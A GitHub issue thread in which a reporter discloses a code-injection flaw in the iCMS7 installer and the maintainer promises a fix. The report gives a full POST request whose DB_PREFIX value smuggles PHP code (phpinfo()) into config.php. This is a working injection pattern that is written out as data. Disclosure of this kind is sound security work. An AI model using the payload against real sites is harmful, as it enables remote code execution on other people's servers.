### ISSUE TITLE
iCMS7 code inject

### ISSUE THREAD

**Issue by dbappxuji** [idreamsoft/iCMS#65]
when install the cms，request http://url/install/install.php as post ，post body is "action=install&DB_HOST=ip&DB_PORT=3306&DB_USER=root&DB_PASSWORD=root&DB_NAME=icms712&CREATE_DATABASE=off&DB_PREFIX=icms_');phpinfo();#&DB_CHARSET=utf8&DB_ENGINE=InnoDB&ADMIN_NAME=admin&ADMIN_PASSWORD=admin%21&ROUTER_URL=http%3A%2F%2Furl"
,it can make code inject.
![1](https://user-images.githubusercontent.com/30098181/56857220-5c402380-699d-11e9-954c-6cd7eb2cd103.png)
Then  request http://ip/config.php

![2](https://user-images.githubusercontent.com/30098181/56857224-6e21c680-699d-11e9-9837-9ba74e6ecf15.png)

**Comment by idreamsoft** [comment]
Thank you, we will fix it as soon as possible
